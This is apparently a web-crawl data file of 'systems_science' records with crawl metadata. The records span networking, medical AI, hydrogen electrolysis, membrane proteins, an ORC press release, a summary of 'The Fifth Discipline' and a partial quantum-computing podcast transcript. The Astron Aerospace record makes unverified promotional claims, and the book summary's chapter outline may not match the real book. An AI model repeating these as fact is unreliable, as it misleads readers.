Cisco Systems, Inc. is the worldwide leader in networking for the Internet. Today, networks are an essential part of business, education, government and home communications, and Cisco Internet Protocol-based (IP) networking solutions are the foundation of these networks. Cisco hardware, software, and service offerings are used to create Internet solutions that allow individuals, companies, and countries to increase productivity, improve customer satisfaction and strengthen competitive advantage. The Cisco name has become synonymous with the Internet, as well as with the productivity improvements that Internet business solutions provide. At Cisco, our vision is to change the way people work, live, play and learn. Hear Ed Bugnion of Cisco (VP/CTO, SAVBU) Talk About Convergence with Emulex - Emulex Announces 10Gb/s FCoE CNAs - Emulex Teams with Cisco and VMware to Deliver Enhanced Storage Solution - Emulex Extends Virtual HBA Technology to Next Generation Fibre Channel over Ethernet and 8Gb/s SAN Connectivity Solutions - Emulex Teams with Nuova Systems to Showcase the First Fibre Channel over Ethernet Demonstration in Europe - Emulex Announces Collaboration with Nuova Systems to Develop Fibre Channel over Ethernet Products
systems_science
https://medailab.es/
2024-04-18T14:49:14
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817206.54/warc/CC-MAIN-20240418124808-20240418154808-00012.warc.gz
0.881806
110
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__68177712
en
The MedAI Lab, founded by Dr. Manuel Campos and Dr. Jose M. Juarez in 2022, designs and implements Medical Informatics and Artificial Intelligence technology aimed at supporting decision-based medical tasks through knowledge- and data-intensive computer-based solutions. Our research creates new avenues to help healthcare professionals in their daily activity and critical decisions, fusing Medical Informatics and Artificial Intelligence technologies (aka Medical AI).
Medical Informatics + Artificial Intelligence = Medical AI
Our final goal is to improve healthcare and professional performance using technology.
systems_science
https://astronaerospace.com/hydrogen-technology/
2024-04-14T13:46:33
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296816879.72/warc/CC-MAIN-20240414130604-20240414160604-00488.warc.gz
0.851939
684
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__169754053
en
We are now taking PRE-ORDERS. No DOWN PAYMENT. All Astron Aerospace technologies are either PATENTED or PATENT pending.
This is a much more efficient way to break the bond between hydrogen and oxygen: the earth provides the heat and the ocean provides the pressure, reducing the amount of energy necessary to split the water. The hydrogen comes up naturally compressed, since it is drawn from deep in the ocean, at anywhere from 30 to 120 bar.
PATENT PENDING - All Technical Information may not be displayed at this time. Write to us to know more!
Like fuel cells, electrolyzers consist of an anode and a cathode separated by an electrolyte. Different electrolyzers function in different ways, mainly due to the different type of electrolyte material involved and the ionic species it conducts.
Polymer Electrolyte Membrane Electrolyzers
In a polymer electrolyte membrane (PEM) electrolyzer, the electrolyte is a solid specialty plastic material. Water reacts at the anode to form oxygen and positively charged hydrogen ions (protons). The electrons flow through an external circuit and the hydrogen ions selectively move across the PEM to the cathode. At the cathode, hydrogen ions combine with electrons from the external circuit to form hydrogen gas.
Anode Reaction: 2H2O → O2 + 4H+ + 4e-
Cathode Reaction: 4H+ + 4e- → 2H2
Alkaline Electrolyzers
Alkaline electrolyzers operate via transport of hydroxide ions (OH-) through the electrolyte from the cathode to the anode, with hydrogen being generated on the cathode side. Electrolyzers using a liquid alkaline solution of sodium or potassium hydroxide as the electrolyte have been commercially available for many years. Newer approaches using solid alkaline exchange membranes (AEM) as the electrolyte are showing promise on the lab scale.
Solid Oxide Electrolyzers
Solid oxide electrolyzers, which use a solid ceramic material as the electrolyte that selectively conducts negatively charged oxygen ions (O2-) at elevated temperatures, generate hydrogen in a slightly different way. Steam at the cathode combines with electrons from the external circuit to form hydrogen gas and negatively charged oxygen ions. The oxygen ions pass through the solid ceramic membrane and react at the anode to form oxygen gas and generate electrons for the external circuit. Solid oxide electrolyzers must operate at temperatures high enough for the solid oxide membranes to function properly (about 700°–800°C, compared to PEM electrolyzers, which operate at 70°–90°C, and commercial alkaline electrolyzers, which typically operate at less than 100°C). Advanced lab-scale solid oxide electrolyzers based on proton-conducting ceramic electrolytes are showing promise for lowering the operating temperature to 500°–600°C. The solid oxide electrolyzers can effectively use heat available at these elevated temperatures (from various sources, including nuclear energy) to decrease the amount of electrical energy needed to produce hydrogen from water.
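For reference alongside the claims above, the standard thermodynamics of water splitting make the energy trade-off explicit. The figures below are textbook values at 25°C, added only for illustration; they are not Astron Aerospace data.

```latex
% Water splitting per mole of H2 at standard conditions (25 C), textbook values
\[
\mathrm{H_2O(l)} \;\rightarrow\; \mathrm{H_2(g)} + \tfrac{1}{2}\,\mathrm{O_2(g)},
\qquad
\Delta H^{\circ} = 285.8~\mathrm{kJ\,mol^{-1}},\quad
\Delta G^{\circ} = 237.1~\mathrm{kJ\,mol^{-1}},\quad
T\Delta S^{\circ} = 48.7~\mathrm{kJ\,mol^{-1}}
\]
\[
E_{\mathrm{rev}} = \frac{\Delta G^{\circ}}{nF}
= \frac{237{,}100~\mathrm{J\,mol^{-1}}}{2 \times 96{,}485~\mathrm{C\,mol^{-1}}}
\approx 1.23~\mathrm{V},
\qquad
E_{\mathrm{thermoneutral}} = \frac{\Delta H^{\circ}}{nF} \approx 1.48~\mathrm{V}
\]
```

The gap between the two voltages corresponds to the T∆S term, which can be supplied as heat rather than electricity. This is the same reason the high-temperature solid oxide route described above needs less electrical energy per unit of hydrogen, and why externally supplied heat and pressure reduce the electrical work required to break the bond.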
systems_science
http://www.irtg1830.com/research/
2017-03-30T02:38:16
s3://commoncrawl/crawl-data/CC-MAIN-2017-13/segments/1490218191984.96/warc/CC-MAIN-20170322212951-00438-ip-10-233-31-227.ec2.internal.warc.gz
0.914916
376
CC-MAIN-2017-13
webtext-fineweb__CC-MAIN-2017-13__0__25972662
en
Membrane proteins are of extraordinary importance for cell and organ function. In general, about one third of the genes in most currently sequenced species code for these proteins. However, it is not only the percentage of genes coding for membrane proteins that is remarkable; the wide variety of functions fulfilled by membrane proteins is even more impressive:
- they generate action potentials and define the membrane potential;
- they are involved in nutrient import and in export of metabolic end-products across the plasma membrane;
- they transduce and induce signalling processes;
- they constitute the respiratory and photosynthetic electron transport chains;
- they influence cell shape, cell adhesion and cell motility;
- they are involved in anabolic and catabolic reactions with intermediates; and
- they are critical for ion and water homeostasis.
This list is, of course, not complete, but it highlights why this group of proteins is present in virtually every membrane from pro- and eukaryotes. Accordingly, great progress has been made in the past in the molecular identification and functional characterisation of a large number of these proteins. The extraordinary importance of membrane proteins is exemplified by the growing research efforts on them and by the many Nobel prizes awarded to membrane researchers in recent years, e.g. Paul Boyer, John Walker and Jens Skou (1997), Günter Blobel (1999), Peter Agre and Roderick MacKinnon (2003), or Richard Axel and Linda Buck (2004). Therefore, it is not surprising that more than 1.2 × 10^6 scientific papers contain the term “membrane protein”, underlining the importance of this protein group.
In summary, research on membrane proteins and their implications for developmental processes and disease is fundamental, mandatory, and represents the cutting edge of corresponding research.
systems_science
https://www.turboden.com/company/media/press/press-releases/4557/turboden-to-design-and-produce-orc-system-for-canadian-oil-and-gas-producer-strathcona-resources-ltd
2024-03-01T10:35:09
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947475238.84/warc/CC-MAIN-20240301093751-20240301123751-00531.warc.gz
0.919341
498
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__209930491
en
Turboden to design and produce Organic Rankine Cycle system for Canadian oil and gas producer, Strathcona Resources Ltd.
10 January 2024
Turboden S.p.A., a Mitsubishi Heavy Industries Group company, is pleased to announce that it has been selected by Strathcona Resources Ltd. (“Strathcona”) to design and produce North America’s largest single-shaft turbine Organic Rankine Cycle (ORC) system with a gross nameplate capacity of up to 19 megawatts. The ORC system, which is planned to be implemented at Strathcona’s Orion thermal oil facility located near Cold Lake, Alberta, Canada, will use waste heat recovery to generate carbon-free electricity, offsetting approximately 80% of the facility’s existing grid-power consumption.
“Turboden has successfully implemented more than 400 ORC systems all over the world and across many diverse industries,” says Paolo Bertuzzi, CEO, Turboden. “We’re excited to showcase the substantial operational and environmental benefits of our technology at this scale and in this environment.”
Implementing ORC technology at steam-assisted gravity drainage (SAGD) operations, like Orion, will allow Strathcona to capture previously lost low-grade thermal heat at approximately 150°C and convert it to emissions-free electricity that can be used to help self-power operations and reduce the need to draw from the local power grid. Low-grade thermal heat from the Orion facility was previously released through aerial coolers.
“We see tremendous value in implementing Turboden’s ORC system at our Orion facility,” shares Rob Morgan, President & CEO of Strathcona Resources. “The technology will convert a waste energy stream from our SAGD operation into usable electricity, lowering power supply costs and reducing the carbon footprint of our operation - demonstrating once again how technology can be applied to improve both the economic and environmental performance of our industry.”
Strathcona’s ORC implementation is slated for completion in the first half of 2025. The project will be constructed within the facility’s existing operational footprint and is estimated to result in approximately 740,000 tonnes of GHG emissions reductions over the project lifetime, the equivalent of taking approximately 226,000 cars off the road.
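To give a feel for the numbers involved, a rough estimate of what a low-grade heat source can deliver is sketched below. The 150°C source temperature and 19 MW nameplate figure come from the announcement; the heat-rejection temperature and the 12% conversion efficiency are assumptions chosen only for illustration and are not Turboden or Strathcona figures.

```python
# Back-of-envelope estimate for low-grade waste-heat power recovery.
# Assumptions (not project data): 25 C heat rejection, 12% net conversion efficiency.

T_HOT_K = 150.0 + 273.15    # heat-source temperature from the announcement, in kelvin
T_COLD_K = 25.0 + 273.15    # assumed heat-rejection temperature, in kelvin

carnot_limit = 1.0 - T_COLD_K / T_HOT_K   # ideal upper bound, roughly 29.5%
assumed_efficiency = 0.12                 # hypothetical ORC conversion efficiency
gross_output_mw = 19.0                    # nameplate capacity quoted in the announcement

heat_input_mw = gross_output_mw / assumed_efficiency

print(f"Carnot limit for a 150 C source and 25 C sink: {carnot_limit:.1%}")
print(f"Waste heat needed for {gross_output_mw:.0f} MW at {assumed_efficiency:.0%}: "
      f"about {heat_input_mw:.0f} MW thermal")
```

Even a modest conversion fraction of a large, otherwise wasted heat stream can offset a substantial share of a facility's grid draw, which is the economic case the release is making.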
systems_science
https://www.booksplease.com/building-learning-organizations-key-insights-from-peter-senges-the-fifth-discipline/
2024-02-27T18:10:04
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947474676.79/warc/CC-MAIN-20240227153053-20240227183053-00479.warc.gz
0.931853
3,657
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__65019325
en
In “The Fifth Discipline,” Peter M. Senge explores the concept of learning organizations and the practices required for fostering organizational excellence in today’s complex world. Senge argues that in order to thrive in an ever-changing environment, organizations must adopt a mindset of continuous learning, challenging their existing mental models, and embracing systems thinking. Written by one of the foremost experts on organizational learning, Peter M. Senge’s groundbreaking work is a must-read for anyone seeking to transform their organization into a dynamic and adaptable entity. Chapter 1: Systems Thinking: Understanding the Power of Interconnectedness Chapter 1 of “The Fifth Discipline” by Peter M. Senge introduces the concept of systems thinking, which is defined as a way of understanding the interconnectedness and interdependency of various elements in a system. Senge highlights the importance of systems thinking as a valuable tool for managing complexity and improving organizational effectiveness. The chapter begins by highlighting the limitations of conventional thinking, which tends to focus on isolated events or problems without considering their broader context. Systems thinking, on the other hand, encourages a more holistic approach that acknowledges the web of relationships and feedback loops that exist within a system. Senge outlines five disciplines that are essential for developing a systems-thinking mindset: personal mastery, mental models, shared vision, team learning, and, ultimately, the fifth discipline, systems thinking itself. He emphasizes that these disciplines should be treated as interrelated and mutually reinforcing, rather than distinct and separate practices. The author also stresses the importance of recognizing and confronting mental models – the deeply ingrained assumptions and beliefs that shape our worldview. By challenging these mental models, individuals and organizations can begin to identify and rectify the systemic causes of persistent problems. Throughout the chapter, examples and case studies are provided to illustrate the powerful impact of systems thinking. One such example is the archetype of the “shifting the burden,” which shows how short-term solutions can lead to unintended consequences in the long run if the underlying systemic issues are not addressed. In summary, Chapter 1 of “The Fifth Discipline” introduces the concept of systems thinking as a means to better understand the interconnectedness of elements within a system. By adopting a systems-thinking mindset and applying the five disciplines, individuals and organizations can uncover the systemic causes of problems and work towards lasting solutions. Chapter 2: Personal Mastery: Cultivating Individual Learning and Growth Chapter 2 of “The Fifth Discipline” by Peter M. Senge, titled “Personal Mastery: Cultivating Individual Learning and Growth,” emphasizes the importance of personal mastery in the development of a learning organization. The chapter starts by defining personal mastery as the discipline of ongoing learning and personal growth. Senge asserts that personal mastery is crucial for individuals to continually expand their knowledge and skills, enabling them to achieve their goals. Personal mastery involves clarifying one’s visions, focusing on truth, and considering reality as it is, rather than how one wishes it to be. Senge introduces the concept of creative tension, which arises when individuals compare their current reality to their desired visions. 
This tension sparks the motivation to learn and grow, encouraging individuals to reflect on their assumptions and challenge their mental models. Personal mastery involves recognizing and embracing creative tension, turning it into a source of energy and inspiration for self-improvement. Another key aspect of personal mastery highlighted in the chapter is commitment to truth, which includes acknowledging and facing one’s weaknesses and limitations. Senge emphasizes that by seeing oneself objectively and accepting feedback, individuals can recognize their blind spots and continuously learn from their experiences. The chapter also stresses the importance of patience and perseverance in personal mastery. Senge explains that genuine personal growth takes time and effort, as individuals need to develop new habits and continuously practice their new skills. In summary, Chapter 2 of “The Fifth Discipline” emphasizes the significance of personal mastery in cultivating individual learning and growth. It explores the concepts of creative tension, commitment to truth, and the importance of patience and perseverance. Adopting personal mastery enables individuals to continually expand their capabilities, align their actions with their visions, and contribute to the development of a learning organization. Chapter 3: Mental Models: Uncovering and Challenging Limiting Beliefs Chapter 3 of “The Fifth Discipline” by Peter M. Senge is titled “Mental Models: Uncovering and Challenging Limiting Beliefs.” In this chapter, Senge explores the concept of mental models, which are deeply ingrained assumptions and beliefs that shape how individuals perceive and interpret the world. Senge argues that mental models are a fundamental barrier to learning and personal growth. These models act as filters, distorting our understanding of reality and limiting our ability to think creatively and solve problems effectively. Moreover, mental models often prevent organizations from adapting to change and achieving their goals. To overcome these limitations, Senge introduces the concept of “mental models mastery.” This process involves surfacing and challenging our deeply held assumptions, as well as cultivating the ability to see the world from multiple perspectives. By doing so, individuals and organizations can become more flexible, adaptive, and open to new ideas. Senge emphasizes the importance of learning organizations in this process. Learning organizations foster a culture of open communication and continuous learning, encouraging individuals to actively challenge their mental models and engage in collective inquiry. By sharing and integrating different perspectives, organizations can more effectively address complex challenges and make better decisions. In summary, Chapter 3 of “The Fifth Discipline” highlights the significance of mental models and their role in shaping individuals’ perception of the world. Senge emphasizes the need to uncover and challenge these limiting beliefs through a process of mental models mastery, in order to foster personal and organizational growth. Chapter 4: Building Shared Vision: Creating a Compelling Future Together Chapter 4 of “The Fifth Discipline” by Peter M. Senge, titled “Building Shared Vision: Creating a Compelling Future Together,” explores the importance of creating a shared vision within organizations to foster commitment, alignment, and motivation. 
Senge defines shared vision as a vivid picture of a preferable future that is communicated and embraced by members of an organization. He emphasizes the significance of shared vision in organizations, as it enables the alignment of individual goals with collective objectives and creates a sense of purpose that motivates people to achieve their common aspirations. The author highlights several key concepts and strategies for building shared vision effectively. Firstly, he underscores the importance of personal mastery as a foundation for shared vision, as it involves individuals understanding their own aspirations and purpose. People who are clear about their goals and values are more likely to contribute to the collective vision. Senge also discusses the significance of dialogue in developing shared vision. Dialogue helps individuals challenge their own assumptions, explore different perspectives, and eventually build a coherent collective vision. He encourages the creation of open communication channels where individuals can share their thoughts, listen to others, and collectively refine their understanding of a compelling future. Furthermore, the author stresses that shared vision is not a top-down process, but rather an ongoing dialogue that involves all members of an organization. It should be developed collaboratively, giving everyone the opportunity to contribute and influence the shared vision. In conclusion, Chapter 4 of “The Fifth Discipline” highlights the importance of shared vision as a unifying force within organizations. By fostering personal mastery, encouraging dialogue, and involving all members, organizations can create a compelling future that inspires commitment, alignment, and motivation towards common goals. Chapter 5: Team Learning: Harnessing Collective Intelligence and Collaboration Chapter 5 of “The Fifth Discipline” by Peter M. Senge focuses on the importance of team learning and how it contributes to the success of organizations. According to Senge, team learning is essential in today’s complex and rapidly changing world as it harnesses collective intelligence and collaboration. The chapter begins by highlighting the limitations of individual learning. Although individual learning is crucial, it is not enough to address systemic issues that organizations face. Team learning, on the other hand, brings the collective intelligence of a group together, allowing for a more comprehensive understanding of problems and innovative solutions. Senge introduces the concept of dialogue as a core component of team learning. Dialogue involves open, honest, and non-judgmental communication among team members. It encourages individuals to suspend their assumptions, truly listen to others, and build shared meaning. Through dialogue, teams can discover new insights, challenge existing mental models, and foster a deeper level of trust and collaboration. The author also emphasizes the importance of systems thinking in team learning. Systems thinking enables individuals to understand how their actions and decisions impact the larger system. By recognizing the interconnections and interdependencies within an organization, teams can identify leverage points where small changes can have significant positive outcomes. Senge provides practical guidelines for cultivating effective team learning. He suggests creating a safe environment where individuals can openly express their thoughts and ideas without fear of judgment. 
He also emphasizes the need for diversity within teams to encourage different perspectives and prevent groupthink. In conclusion, Chapter 5 of “The Fifth Discipline” highlights the significance of team learning in harnessing collective intelligence and fostering collaboration within organizations. By engaging in open dialogue, adopting systems thinking, and creating a supportive culture, teams can enhance their capacity to learn and adapt in today’s complex world. Chapter 6: Systems Thinking in Action: Applying the Fifth Discipline in Organizations Chapter 6 of “The Fifth Discipline” by Peter M. Senge is titled “Systems Thinking in Action: Applying the Fifth Discipline in Organizations.” In this chapter, Senge explores the practical applications of systems thinking within organizations. Senge begins by emphasizing the importance of shifting from a conventional linear mindset to a more holistic systems thinking approach. He explains that traditional problem-solving methods often lead to unintended consequences due to their reductionist nature and lack of understanding of the underlying systemic structures at play. The author then introduces a case study of an organization called Hanover Insurance and how they successfully utilized systems thinking to address their business challenges. Hanover Insurance recognized the interconnectedness of different departments and the need for collaboration to achieve desired outcomes. They implemented techniques such as causal loop diagrams and feedback analysis to identify the root causes of problems and develop effective solutions. Senge further emphasizes the need for shared vision and mental models within organizations. He explains how these shared mental models contribute to building a learning organization where every member understands the system and their role within it. This shared understanding leads to a more effective analysis of problems and promotes collaboration among team members. The chapter also discusses the importance of personal mastery and systems thinking as a leadership skill. Senge highlights the role of leaders in fostering a learning culture and creating an environment that encourages open dialogue, questioning assumptions, and challenging the status quo. He emphasizes that leaders must not only embrace systems thinking themselves but also help others develop their own systemic thinking abilities. In conclusion, Chapter 6 of “The Fifth Discipline” highlights the practical applications of systems thinking in organizations. It emphasizes the importance of understanding the bigger picture, promoting collaboration, fostering a shared vision, and developing personal mastery and leadership qualities. By integrating these principles, organizations can become more adaptable, innovative, and effective in solving complex problems. Chapter 7: The Learning Organization: Creating a Culture of Continuous Learning Chapter 7 of “The Fifth Discipline” by Peter M. Senge is entitled “The Learning Organization: Creating a Culture of Continuous Learning.” In this chapter, Senge highlights the importance of creating a learning organization and the key principles associated with it. The chapter starts with Senge emphasizing that organizations need to become learning organizations to survive and thrive in an ever-changing world. He argues that the rate of change in today’s business environment necessitates continuous learning and adaptation. A learning organization is one that actively promotes and facilitates the learning of its members at all levels. 
Senge introduces five principles that are central to building a culture of continuous learning in an organization. The first principle is “Personal Mastery,” which focuses on encouraging individuals to constantly improve themselves and their skills. The second principle is “Mental Models,” which acknowledges the need to challenge and reshape our beliefs and assumptions to foster new thinking and innovation. The third principle is “Shared Vision,” which emphasizes the importance of aligning all members of the organization with a common vision and purpose. The fourth principle is “Team Learning,” which emphasizes the development of effective team communication and collaboration. Lastly, the fifth principle is “Systems Thinking,” which emphasizes understanding the interconnectedness and interdependencies of various components within an organization. Senge argues that these principles should be integrated into the organization’s structure, processes, and practices. He emphasizes the significance of creating a culture of trust, where people feel safe to take risks, share their ideas, and engage in open dialogue. Learning, according to Senge, involves not only acquiring new knowledge but also the ability to apply it effectively. Overall, this chapter encourages organizations to embrace a learning mindset and actively cultivate a culture of continuous learning, as this is essential for adapting, innovating, and remaining competitive in the face of rapidly changing circumstances. Chapter 8: Leadership and the Fifth Discipline: Fostering Learning and Change Chapter 8 of “The Fifth Discipline” by Peter M. Senge explores the concept of leadership and its role in fostering learning and change within organizations. Senge argues that true leadership goes beyond individual traits or hierarchical positions; it involves the ability to influence others towards shared visions and goals. Senge highlights the importance of systems thinking and the integration of the five disciplines (personal mastery, mental models, shared vision, team learning, and systems thinking) in effective leadership. A leader’s role is to develop a shared vision that inspires people and creates a sense of purpose. They must encourage individual and collective learning by fostering an environment where ideas are freely shared, challenging assumptions and mental models. Leaders are portrayed as designers, responsible for creating organizations that promote learning and growth. They are also facilitators, capable of engaging individuals and teams in dialogue to address conflicts and achieve better decision-making. Senge emphasizes the significance of organizational learning, as it enables a company to adapt and shape its future successfully. The chapter also delves into the importance of personal mastery for leaders. Personal mastery involves the continuous improvement and development of one’s own skills and abilities. Leaders who embody personal mastery inspire others to take on challenges and develop their own mastery. They foster collaboration and empower individuals to take responsibility for their growth. Overall, Chapter 8 emphasizes that leaders play a crucial role in creating learning organizations that adapt to change. By incorporating the principles of systems thinking and fostering personal mastery, shared vision, team learning, and mental models, leaders can foster an environment that encourages continuous learning, innovation, and growth. In conclusion, “The Fifth Discipline” by Peter M. 
Senge explores the concept of the fifth discipline, or systems thinking, as a crucial skill for organizations to thrive in a constantly changing world. Senge emphasizes the interconnectivity of various parts within a system and highlights the importance of learning, dialogue, and personal mastery in achieving organizational success. He explains the five disciplines of a learning organization: personal mastery, mental models, shared vision, team learning, and systems thinking. Through engaging case studies and practical tools, Senge provides readers with insights on how to foster a culture of continuous learning, collaboration, and innovation. Ultimately, “The Fifth Discipline” serves as a thought-provoking guide for individuals and leaders to transform their organizations by integrating systems thinking into their core practices.
1. “The Effective Executive” by Peter F. Drucker: This classic business book provides invaluable insights into effective management and decision-making. Drucker emphasizes the importance of setting priorities, managing time, and focusing on results. It is a must-read for anyone seeking to enhance their leadership skills.
2. “Innovation and Entrepreneurship” by Peter F. Drucker: In this book, Drucker explores the principles and practices that drive successful entrepreneurship and innovation. He provides practical guidance on identifying opportunities, fostering creativity, and building a culture of innovation within an organization. This book is essential for aspiring entrepreneurs and leaders looking to drive growth and adapt to a rapidly changing business landscape.
3. “Jack: Straight from the Gut” by Jack Welch: Written by one of the most renowned business leaders of our time, this autobiography offers invaluable lessons on leadership, strategy, and organizational transformation. Jack Welch, the former CEO of General Electric, shares his experiences and insights, providing readers with practical advice on how to drive success in a competitive business environment.
4. “The Lean Startup” by Eric Ries: This book revolutionized the startup world by introducing the concept of the lean methodology. Ries emphasizes the importance of validated learning, continuous innovation, and rapid experimentation. Whether you’re a budding entrepreneur or work within an established organization, this book will help you adopt a more agile and customer-driven approach to building and scaling your business.
5. “Thinking, Fast and Slow” by Daniel Kahneman: This groundbreaking book by Nobel laureate Daniel Kahneman explores the two systems that drive human thinking – the fast, intuitive, and emotional system, and the slow, deliberate, and logical system. Kahneman examines how these systems influence our decision-making and sheds light on the biases and errors that can cloud our judgment. This thought-provoking read will equip you with a better understanding of human behavior and decision-making, making it an essential book for anyone involved in leadership or strategic decision-making.
systems_science
https://ie-knowledgehub.ca/market-hunt-podcast-episode-list/bridging-quantum-physics-and-computer-science/
2023-01-27T01:01:55
s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764494852.95/warc/CC-MAIN-20230127001911-20230127031911-00762.warc.gz
0.955756
11,083
CC-MAIN-2023-06
webtext-fineweb__CC-MAIN-2023-06__0__304331968
en
Quantum computing has been hailed as the next revolution in computer science. What are some market applications and how is quantum tech evolving on the hardware and software side? “For anybody who’s really on the sidelines looking into what’s happening in hardware in quantum computing, it’s a very exciting time because everything is in flux.” Guest bio: Andrew Fursman Andrew Fursman is a Co-Founder of 1QBit and serves as its Chief Executive Officer. Andrew was a Founding Partner of Vancouver-based VCC firm Minor Capital, Co-Founder of Satellogic Nano-Satellites, and Co-Founder of Cloudtel Communications. Andrew studied Economics at the University of Waterloo and Philosophy and Political Science at the University of British Columbia prior to post-graduate programs in Technology Studies at Singularity University and Financial Engineering at Stanford University. On those rare occasions when he is not busy with his 1QBit duties, he indulges his passions for kayaking in the gulf islands and explores practical applications of microbiology at a small home laboratory on Vancouver Island dedicated to experiments with Saccharomyces cerevisiae. More Andrew Fursman media interviews Optical Quantum Systems Ion Quantum Systems Quantum information theory explained – Mark Wilde, McGill fellow, Part 1 Quantum information theory explained – Mark Wilde, Part 2 Ie-Knowledge Hub Sponsor Case Episode research Question What steps can 1Qbit take to find what industry problems can be solved using quantum computing technology? Write to us at [email protected] and we’ll post some of your answers on our website page. Episode Full Transcript Market Hunt S02 E09 / 1Qbit/ Andrew Fursman episode transcript [Begin intro music] Thierry Harris: Imagine a world with computers so powerful they could process problems which would take today’s computers thousands of years to compute and reduce that time seconds. Quantum computing offers this possibility. In this episode of Market Hunt we’ll discuss the ideas, technology, and market opportunities behind Quantum computing. Andrew Fursman: For anybody who’s really on the sidelines looking into what’s happening in hardware in quantum computing, it’s a very exciting time because everything is in flux and all of these technologies are rapidly developing. It really does look a little bit like a horse race where you’re trying to understand who is out in front, and do they have the ability to stay in front? [end intro music] [begin theme song music] Nick Quain: Entrepreneurship is hard, you need to have support there. Andrew Casey: We fundamentally have to learn how to live our lives differently. We can’t keep going the way we have. Handol Kim: It’s not like Google can come and move in and take the entire market. Not yet, right? Thierry Harris: It’s a real balancing act which requires a bit of insanity frankly. But I mean some people are into that stuff I guess. Handol Kim: You know the size of the market, that’s really all you’ve got. Thierry Harris: We’re coming up with some pretty interesting ideas here. Andrew Casey: We’ve solved everything, Thierry Harris: [chuckles] We’ve solved it all. [End theme song music] [Begin promo music] Narration: And now a message from our sponsor, IE-KnowledgeHub. IE-KnowledgeHub is a website dedicated to promoting learning and exchanges on international entrepreneurship. Watch Video Case Studies, listen to podcasts and much more! 
If you are an education professional looking for course content, an academic researcher seeking research material , or someone interested in business innovation check out Ie-KnowledgeHub. Ie-KnowledgeHub focuses on innovation ecosystems and firms who commercialize their technologies in international markets. Let’s listen in to a Video Case Study featuring Prevtec Microbia. Eric Nadeau: Everything started with a need. The veterinarians called at the reference laboratory for E. coli., different veterinarians, we have a problem, post weaning diarrhea that is more severe than in the past, and the antibiotics don’t work anymore. And we need a solution for this. Narration: That’s Eric Nadeau of Prevtec Microbia. Prevtec develops vaccines to address E. coli outbreaks in swine. Nadeau started as a fundamental scientific researcher at the university of Montreal’s epidemiology department in the faculty of veterinary medicine. He understood the importance of overuse of antibiotics in treating animals. But the decision to use a live bacterial vaccine vs antibiotics isn’t an easy one. Eric Nadeau: When a producer faces a disease, he will look at different products or strategies. And we are calculating everything at the level of cents, not dollars. Narration: To reach farmers, Nadeau had to understand their decision making process. The farmers were making decisions on costs down to the nearest penny. Prevtec’s vaccine was more expensive than antibiotic solutions currently available. He needed to find a way to contrast the vaccine Prevtec had developed with these antibiotics. This was no easy task. He knew he had to be patient. Eric Nadeau: You took the decision, let’s go on antibiotics, but i’m pretty sure in six months you will call me because the antibiotics will not work anymore, you will go on the vaccine, and you will have the insurance that the problem is solved, you can sleep on it and work on other problems you have. Narration: How did Prevtec, a small company born out of a spinoff of a research project at the University of Montreal’s veterinary school build itself into a full blown company? Find out more at the end of the show. You can also checkout the Prevtec Microbia video case study by visiting ie hyphen knowledgehub.ca. And now, back to the show. [End promo music] Thierry Harris: When comparing classical and quantum computers a good metaphor could be of use. Dr. Shohini Ghose, Wilfred Laurier university physicist wants us to think of classical and quantum computers the way we think of a candle and a light bulb, she says quote: “ The lightbulb isn’t just a better candle, it’s something completely different.” Quantum computing today is at the state where classical computers were when they were first being built decades ago. It’s an exciting time. The industry is being pulled by the promise of quantum enabled technologies which will dramatically impact the fields of drug discovery, cryptography, telecommunications, material sciences and financial modelling to name but a few. Deal making among quantum computing companies is at an all-time high. Capital invested in global companies focused on quantum computing and technology has reached $2.5 billion so far this year, according to financial data firm PitchBook. That’s up from $1.5 billion in all of 2020. It’s been predicted that the quantum tech ecosystem consisting of Software & consulting companies, Hardware manufacturers and quantum enabling technology companies could be worth 18 billion by 2024. 
In terms of patents for quantum hardware, companies like IBM and Canada’s D-Wave lead the pack. On the quantum computing software side, IBM, Microsoft and Google are out in front. Looking at overall, China dominates the U.S by a score of 2 to 1 with more than 3000 patents in the Quantum technology field. On this episode of Market Hunt, we speak with Andrew Fursman, Co-Founder and CEO of 1Qbit. This episode is full of concepts relating to quantum mechanics which might require a bit more research to comprehend. Feel free to explore the episode transcript for links to further reading on topics discussed in this podcast. Andrew starts us off by describing the raison d’être of 1Qbit. Are you ready? Let’s go. Andrew Fursman: 1QBit is really a company that was founded in order to answer the question of why do we need more powerful computers, and what will these more powerful computers look like, and how will we actually employ them to do meaningful work? Of course, we’re extremely excited about the advances within Quantum computation and we see our long-term goal. What I would think of as success would be a future world in which a significant portion of the workload of high-performance computing is being performed on the back end by Quantum computing devices and processors that do not look like what we’re using today, being able to actually draw that through-line from hard industrial problems to new types of computation. If 1QBit was the facilitator that was really enabling that work to happen, I think I would consider our work here a success. Thierry Harris: In a very mercantile sense, you’re almost like a broker for picking the best Quantum solutions to solve some of the industry’s toughest problems. Can you describe perhaps what problems you are attacking at 1QBit? What links you’re having with the industry? Andrew Fursman: Yes, thank you. I would say that 1QBit is very interested in performing that intermediary role, but actually we also really think about being in the middle between those new types of devices. These very hard problems also really helps us to be able to craft those solutions on the software side, but also to give insights to the architectures of these forthcoming devices in order to be able to say, for example, if your device doesn’t have the ability to improve this problem then our partner at this company is not interested in this processor. We like to think that by being in the middle, we actually have the ability to shape both the applications and the hardware. We spread ourselves out from that middle position. A very concrete example is the work that we believe will be changed around how new materials and advanced material discovery and design progresses. Most people know that Quantum computing as an idea actually dates back as early as the 1980s where famously Richard Feynman suggested that if you’re going to try and do computation to understand how the physical world works, if the physical world is based on Quantum information processing then we should probably build Quantum information processors in order to simulate the real world. Essentially saying let’s cut out the middleman and instead of having to try and translate the behavior that we see in the real world into a form that’s amenable to the types of computers that we’ve already built. Instead, we should build new types of computers that compute using the same principles that really animate the universe. 
